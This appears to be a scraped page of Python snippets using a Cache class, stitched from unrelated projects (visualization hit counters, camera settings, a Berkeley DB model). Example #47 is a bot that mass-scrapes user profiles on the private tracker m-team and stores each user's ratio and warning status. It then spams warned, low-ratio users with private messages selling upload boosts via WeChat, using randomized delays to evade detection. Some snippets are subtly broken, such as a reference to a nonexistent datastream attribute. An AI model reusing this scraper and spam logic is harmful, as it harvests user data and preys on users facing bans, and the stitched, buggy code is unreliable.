    doc_type = "vz"
    from_cache = False

    # cache TTL, 1 hour
    TTL = 3600

    def __init__(self, visualization):
        self.visualization = visualization
        self.search_index = ElasticsearchIndex()
        self.logger = logging.getLogger(__name__)
        self.cache = Cache()

    def add(self, channel_type):
        """agrega un hit al datastream. """

        try:
            hit = VisualizationHits.objects.create(
                visualization_id=self.visualization.visualization_id, channel_type=channel_type
            )
        except IntegrityError:
            # is this exception correct?
            raise VisualizationNotFoundException()

        self.logger.info("VisualizationHitsDAO hit! (guid: %s)" % (self.datastream.guid))

        # build the document used to update the index.
        doc = {
            "docid": "%s::%s" % (self.doc_type.upper(), self.visualization.guid),
            "type": self.doc_type,
            "script": "ctx._source.fields.hits+=1",
        }

        return self.search_index.update(doc)

    def count(self):
        return VisualizationHits.objects.filter(visualization_id=self.visualization.visualization_id).count()

    def _get_cache(self, cache_key):

        cache = self.cache.get(cache_key)

        return cache

    def _set_cache(self, cache_key, value):

        return self.cache.set(cache_key, value, self.TTL)

    def count_by_day(self, day):
        """retorna los hits de un día determinado"""

        # if it is a datetime, use only the date part
        if type(day) == type(datetime.today()):
            day = day.date()

        cache_key = "%s_hits_%s_by_date_%s" % (self.doc_type, self.visualization.guid, str(day))

        hits = self._get_cache(cache_key)

        # if this particular day is not in the cache, store it;
        # unless the day passed in is today: then store it in the cache, but always use the DB value
        if not hits or day == date.today():
            hits = VisualizationHits.objects.filter(
                visualization=self.visualization, created_at__startswith=day
            ).count()

            self._set_cache(cache_key, hits)

        return day, hits

    def count_by_days(self, day=30, channel_type=None):
        """trae un dict con los hits totales de los ultimos day y los hits particulares de los días desde day hasta today"""

        # not sure whether this check is necessary
        if day < 1:
            return {}

        cache_key = "%s_hits_%s_%s" % (self.doc_type, self.visualization.guid, day)

        if channel_type:
            cache_key += "_channel_type_%s" % channel_type

        hits = self._get_cache(cache_key)

        # darn! it is not in the cache
        if not hits:
            # the start date
            start_date = datetime.today() - timedelta(days=day)

            # take only the date part
            truncate_date = connection.ops.date_trunc_sql("day", "created_at")

            qs = VisualizationHits.objects.filter(visualization=self.visualization, created_at__gte=start_date)

            if channel_type:
                qs = qs.filter(channel_type=channel_type)

            hits = (
                qs.extra(select={"_date": truncate_date, "fecha": "DATE(created_at)"})
                .values("fecha")
                .order_by("created_at")
                .annotate(hits=Count("created_at"))
            )

            control = [date.today() - timedelta(days=x) for x in range(day - 1, 0, -1)]
            control.append(date.today())

            for i in hits:
                try:
                    control.remove(i["fecha"])
                except ValueError:
                    pass

            hits = list(hits)

            for i in control:
                hits.append({"fecha": i, "hits": 0})

            hits = sorted(hits, key=lambda k: k["fecha"])

            # convert the dates to ISO format
            hits = map(self._date_isoformat, hits)

            # kindly leave the result in the cache!
            self._set_cache(cache_key, json.dumps(hits, cls=DjangoJSONEncoder))

            self.from_cache = False
        else:
            hits = json.loads(hits)
            self.from_cache = True

        return hits

    def _date_isoformat(self, row):
        row["fecha"] = row["fecha"].isoformat()
        return row
Example #39
 def _delete_cache(self, cache_key, cache_db=0):
     """ limpiar un cache específico
     cache_db=0 es el cache principal (CACHE_DATABASES)
     usado para actualizar luego de modificar recursos que requieren actualización rápida"""
     c = Cache(db=cache_db)
     c.delete(cache_key)
Example #40
 def __init__(self, visualization):
     self.visualization = visualization
     self.search_index = ElasticsearchIndex()
     self.logger = logging.getLogger(__name__)
     self.cache = Cache()
Example #41
 def _delete_cache(self, cache_key, cache_db=0):
     """ limpiar un cache específico
     cache_db=0 es el cache principal (CACHE_DATABASES)
     usado para actualizar luego de modificar recursos que requieren actualización rápida"""
     c = Cache(db=cache_db)
     c.delete(cache_key)
Example #42
class UploadCheck(AdultAlert):
    cache = Cache()

    is_store = True

    def parse(self, soup_obj):
        assert soup_obj is not None

        info_block = soup_obj.select(
            "#info_block table tr td:nth-of-type(1) span")[0]

        prev_info = ""
        upload = 0
        download = 0
        for info in info_block.contents:
            if "上傳量" in prev_info:
                upload = HttpUtils.pretty_format(info, "GB")
            elif "下載量" in prev_info:
                download = HttpUtils.pretty_format(info, "GB")
                break
            prev_info = str(info)

        return upload, download

    def filter(self, data):
        return data

    def action(self, data):
        prev_up = self.cache.get("mt_up")
        prev_down = self.cache.get("mt_down")

        if prev_up is None:
            prev_up = 0
        else:
            prev_up = float(prev_up.decode())
        if prev_down is None:
            prev_down = 0
        else:
            prev_down = float(prev_down.decode())

        delta_up = round(data[0] - prev_up, 2)
        delta_down = round(data[1] - prev_down, 2)
        if delta_down == 0:
            delta_ratio = "Inf"
        else:
            delta_ratio = round(delta_up / delta_down, 2)

        upload_target = Config.get("mteam_upload_target")
        current_upload = round(data[0] - data[1], 2)
        print(
            "%s, upload=%s, download=%s, current=%s, delta_up=%s, delta_down=%s, delta_ratio=%s, target=%s"
            %
            (str(time.strftime("%Y-%m-%d %H:%M:%S")), data[0], data[1],
             current_upload, delta_up, delta_down, delta_ratio, upload_target))

        if self.is_store:
            self.cache.set("mt_up", data[0])
            self.cache.set("mt_down", data[1])

        if upload_target < current_upload:
            for i in range(5):
                EmailSender.send(u"完成上传", Config.get("mteam_username"))
                time.sleep(10000)

    def init(self):
        self.cache.set("mt_up", 0)
        self.cache.set("mt_down", 0)

    def check_not_store(self):
        # backup current configuration
        is_store = self.is_store
        self.is_store = False
        self.check()
        self.is_store = is_store
Example #43
 def getBrightness():
     value = Cache().get("brightness")
     if value is None:
         value = 60
         Cache().set("brightness", value)
     return value
Example #44
 def setBrightness(delta):
     value = int(Camera.getBrightness()) + int(delta)
     value = min(100, max(0, value))
     Cache().set("brightness", value)
Example #45
 def is_enable_face_detect():
     return Cache().get("face_detect") == "1"
Example #46
 def __init__(self, clsobj=XParcel):
     self.__db = DB()
     self.__cache = Cache()
     self.__clsobj = clsobj
     self.maxCount = 4096
Example #47
class UserCrawl(NormalAlert):
    buffer = []
    errors = []

    id_bucket_name = "mteam_user_id"
    name_bucket_name = "mteam_user_name"
    msg_bucket_name = "mteam_msg"

    min_id = 1
    max_id = 200000
    scan_batch_size = 500
    skip_if_exist = False  # ignore cache and re-crawl all user

    cache = Cache()

    msg_subject = "分享率过低的账户会被警告并封禁,请注意(%s)"
    msg_body = "如需快速增加上传,消除警告,请微信联系 helloword1984(用户名是薛定谔的小仓鼠)\n\n注1:本人非网站工作人员\n注2:如果打扰到了您,表示抱歉,请pm回复'谢谢勿扰'"

    msg_urgent_subject = "注意!注意!注意!分享率低于0.3的账户可能随时会被封号!"
    msg_urgent_body = "如需快速增加上传,消除警告,请微信联系 helloword1984(用户名是薛定谔的小仓鼠)\n\n注1:本人非网站工作人员\n注2:如果打扰到了您,表示抱歉,请pm回复'谢谢勿扰'"

    def generate_site(self):
        self.site.home_page = "https://kp.m-team.cc/userdetails.php?id=%s"
        return self.site

    def crawl_single(self, user_id):

        if self.skip_if_exist and self.cache.hash_get(self.id_bucket_name,
                                                      user_id) is not None:
            print("Skip " + str(user_id))
            return

        try:
            url = self.site.home_page % str(user_id)
            soup_obj = HttpUtils.get(url,
                                     headers=self.site.login_headers,
                                     return_raw=False)
            assert soup_obj is not None

            user = User()
            user.id = user_id
            user.name = HttpUtils.get_content(soup_obj, "#outer h1 span b")

            if user.name is None:
                return

            user.is_warn = len(
                soup_obj.select("#outer h1 span img[alt='Leechwarned']")) > 0
            user.is_ban = len(
                soup_obj.select("#outer h1 span img[alt='Disabled']")) > 0
            if user.is_warn:
                user.warn_time = str(time.strftime("%Y-%m-%d %H:%M:%S"))

            try:
                if len(soup_obj.select("#outer table tr")) <= 5:
                    user.is_secret = True
                    # print("secret user: name={0} id={1}".format(user.name, str(user_id)))
                else:
                    tr_list = soup_obj.select("#outer table tr")
                    for tr in tr_list:
                        td_name = HttpUtils.get_content(
                            tr, "td:nth-of-type(1)")
                        if td_name == "加入日期":
                            user.create_time = HttpUtils.get_content(
                                tr, "td:nth-of-type(2)").replace(" (", "")
                        elif td_name == "最近動向":
                            user.last_time = HttpUtils.get_content(
                                tr, "td:nth-of-type(2)").replace(" (", "")
                        elif td_name == "傳送":
                            user.ratio = HttpUtils.get_content(
                                tr, "td:nth-of-type(2) table tr td font")
                            if user.ratio is None:
                                # seems that no download is made and ratio is infinite
                                user.ratio = -1
                                user.up = self.parse_size_in_gb(
                                    HttpUtils.get_content(
                                        tr,
                                        "td:nth-of-type(2) table tr:nth-of-type(1) td:nth-of-type(1)",
                                        1))
                                user.down = self.parse_size_in_gb(
                                    HttpUtils.get_content(
                                        tr,
                                        "td:nth-of-type(2) table tr:nth-of-type(1) td:nth-of-type(2)",
                                        2))
                            else:
                                user.ratio = user.ratio.replace(",", "")
                                user.up = self.parse_size_in_gb(
                                    HttpUtils.get_content(
                                        tr,
                                        "td:nth-of-type(2) table tr:nth-of-type(2) td:nth-of-type(1)",
                                        1))
                                user.down = self.parse_size_in_gb(
                                    HttpUtils.get_content(
                                        tr,
                                        "td:nth-of-type(2) table tr:nth-of-type(2) td:nth-of-type(2)",
                                        2))
                        elif td_name == "魔力值":
                            user.mp = HttpUtils.get_content(
                                tr, "td:nth-of-type(2)")

                    # parse rank
                    user.rank = "secret"
                    imgs = soup_obj.select(
                        "table.main table tr > td > img[title!='']")
                    for img in imgs:
                        if not img.has_attr("class"):
                            user.rank = img["title"]

                            if "Peasant" in user.rank:
                                user.warn_time = str(
                                    time.strftime("%Y-%m-%d %H:%M:%S"))
                                # print("###### find user="******" id=" + str(user_id) + " rank=" + user.rank)
            except Exception as e:
                print(str(user_id) + "\n" + str(e) + "\n")

            self.buffer.append(user)
        except Exception as e:
            print(">>>>> fail to parse " + str(user_id))
            self.errors.append(user_id)

    def parse_size_in_gb(self, size_str):
        assert size_str is not None
        return HttpUtils.pretty_format(size_str.replace(": ", ""), "GB")

    def store_cache(self, data):
        if data is None or len(data) == 0:
            return

        for user in data:
            res = self.cache.hash_get(self.id_bucket_name, user.id)
            if res is not None:
                exist_user = User.parse(res.decode())
                # warned before, do not update warn time
                if user.is_warn and exist_user.is_warn:
                    user.warn_time = exist_user.warn_time

            self.cache.hash_set(self.id_bucket_name, user.id, str(user))
            self.cache.hash_set(self.name_bucket_name, user.name, str(user))

        print("########### finish storing cache ###########")

    def crawl(self, ids=None):
        self.login_if_not()

        if ids is None:
            ids = range(self.min_id, self.max_id)
            self.skip_if_exist = True

        start = 0
        end = len(ids)
        step = self.scan_batch_size

        current = start
        while current < end:
            print(">>>>>>>>>>>> crawl {0} -> {1} >>>>>>>>>>>>>>>>".format(
                ids[current], ids[min(current + step, end - 1)]))
            ParallelTemplate(500).run(
                func=self.crawl_single,
                inputs=ids[current:min(current + step, end)])
            current += step + 1

            if len(self.errors) > 0:
                print(">>>>>>>>>>>>>>>>> retry >>>>>>>>>>>>>>>>>>>>>>")
                ParallelTemplate(100).run(func=self.crawl_single,
                                          inputs=self.errors)
                self.errors.clear()
                print(
                    ">>>>>>>>>>>>>>>>> retry finished >>>>>>>>>>>>>>>>>>>>>>")

            if len(self.buffer) > 300:
                self.store_cache(self.buffer)
                self.buffer.clear()

        # write all others left
        self.store_cache(self.buffer)
        self.buffer.clear()

    def refresh(self):
        ids = list(
            sorted(
                map(lambda x: int(x.decode()),
                    self.cache.hash_get_all_key(self.id_bucket_name))))
        print("max ID=" + str(ids[-1]))
        self.min_id = ids[-1] + 1
        self.max_id = self.min_id + 1000

        print("\n############## refresh user ##############\n")
        # refresh existing user
        self.crawl(ids)

        print("\n############## crawl new user ##############\n")
        # find new user
        self.crawl()

    def warn(self):
        self.refresh()
        warn_white_list = str(Config.get("mt_warn_white_list")).split("|")

        user_ids = self.cache.hash_get_all_key(self.id_bucket_name)
        now = datetime.now()
        for user_id in user_ids:
            user_str = self.cache.hash_get(self.id_bucket_name,
                                           user_id).decode()
            user = User.parse(user_str)
            if user.is_ban or not user.is_warn or "VIP" in user.rank or "職人" in user.rank:
                continue
            if user.is_secret or (0.5 > user.ratio > -1 or
                                  (0.9 > user.ratio
                                   and user.down - user.up > 50)):
                if user.create_time == "":
                    create_since = 999999
                else:
                    create_time = datetime.strptime(user.create_time,
                                                    "%Y-%m-%d %H:%M:%S")
                    create_since = (now - create_time).days
                warn_time = datetime.strptime(user.warn_time,
                                              "%Y-%m-%d %H:%M:%S")
                warn_since = (now - warn_time).days
                print("{0}|{1}|{2}".format(str(user), str(create_since),
                                           str(warn_since)))

                # new users with a ratio lower than 0.3 will be banned at any time
                if create_since < 30 and user.ratio < 0.3 and warn_since in [
                        0, 1
                ]:
                    self.send_msg(user.id, self.msg_urgent_subject,
                                  self.msg_urgent_body)
                    continue

                # skip user who has registered for less than 2 days
                if create_since < 2:
                    continue

                if user.name in warn_white_list:
                    continue

                if warn_since in [0, 3, 5]:
                    self.send_msg(user.id, self.msg_subject % (7 - warn_since),
                                  self.msg_body)

    def order(self, limit=250):
        user_ids = self.cache.hash_get_all_key(self.id_bucket_name)
        users = []
        for user_id in user_ids:
            user_str = self.cache.hash_get(self.id_bucket_name,
                                           user_id).decode()
            user = User.parse(user_str)
            if not user.is_secret and not user.is_ban and user.ratio >= 0 and user.down >= 10 and "VIP" not in user.rank and "職人" not in user.rank:
                users.append(user)

        users.sort(key=lambda x: x.ratio)
        for i in range(0, int(limit)):
            print(users[i])

    def load_by_id(self, user_id):
        res = self.cache.hash_get(self.id_bucket_name, user_id)
        if res is not None:
            print(res.decode())
        else:
            print("Cannot find user by ID: " + user_id)

    def load_by_name(self, user_name):
        res = self.cache.hash_get(self.name_bucket_name, user_name)
        if res is not None:
            print(res.decode())
        else:
            print("Cannot find user by name: " + user_name)

    def send_msg(self, user_id, subject, body):
        if self.cache.get(self.msg_bucket_name + str(user_id)) is not None:
            print("Skip sending msg, user in cache: " + str(user_id))
            return

        self.login_if_not()

        url = "https://kp.m-team.cc/takemessage.php"
        data = {
            "receiver": user_id,
            "subject": subject,
            "body": body,
            "save": "yes"
        }

        HttpUtils.post(url=url, data=data, headers=self.site.login_headers)
        print(">>>>>>>>> Send msg to {0}, subject={1}, body={2} >>>>>>>>>>".
              format(user_id, subject, body))

        self.cache.set_with_expire(self.msg_bucket_name + str(user_id), "",
                                   86400)

        # sleep 30 ~ 120 seconds before sending next message
        time.sleep(round(30 + random.random() * 90))
Example #48
class Model:
    def __init__(self, clsobj=XParcel):
        self.__db = DB()
        self.__cache = Cache()
        self.__clsobj = clsobj
        self.maxCount = 4096

    def open(self, filepath, mode='w'):
        self.mode = mode
        intMode = {'r': DB_RDONLY, 'w': DB_CREATE | DB_TRUNCATE, 'a': DB_CREATE}[mode]
        self.__db.setcache(256*1024*1024, 0)
        return self.__db.open(filepath, intMode)

    def close(self):
        self.sync()
        self.__db.close()

    def put(self, key, data):    
        self.__cache.put(key, data)
        self.__measure()

    def get(self, key):
        value = self.__cache.get(key)
        if not value:
            value = self.db_get(key)
            if value:
                self.__cache.put(key, value)
                self.__measure()
        return value

    def keys(self):
        self.sync()
        cursor = self.__db.cursor()
        result = cursor.get(None, DB_FIRST|XDB_NOT_RETRIEVE_VAL)
        while result:
            if not result[0].startswith('__'):
                yield result[0]
            result = cursor.get(None, DB_NEXT|XDB_NOT_RETRIEVE_VAL)
        cursor.close()

    def values(self):
        self.sync()
        cursor = self.__db.cursor()
        result = cursor.get(None, DB_FIRST)
        while result:
            if not result[0].startswith('__'):
                obj = self.__clsobj()
                obj.unpack(result[1])
                yield obj
            result = cursor.get(None, DB_NEXT)
        cursor.close()
        
    def sync(self):
        for key, value in self.__cache.items():
            self.db_put(key, value)

    def items(self):
        self.__cache.cache_sync()
        cursor = self.__db.cursor()
        result = cursor.get(None, DB_FIRST)
        while result:
            if not result[0].startswith('__'):
                obj = self.__clsobj()
                obj.unpack(result[1])
                yield result[0], obj
            result = cursor.get(None, DB_NEXT)
        cursor.close()
        
    def __measure(self):
        while len(self.__cache) > self.maxCount:
            #print len(self.__cache), self.__cache.__dict__
            key, value = self.__cache.top()
            self.db_put(key, value)
            self.__cache.pop()

    def db_get(self, key):
        result = self.__db.get(key, 0)
        if result:
            obj = self.__clsobj()
            obj.unpack(result[1])
            return obj
        return None

    def db_put(self, key, data):
        if self.mode != 'r':
            return self.__db.put(key, data.pack(), 0)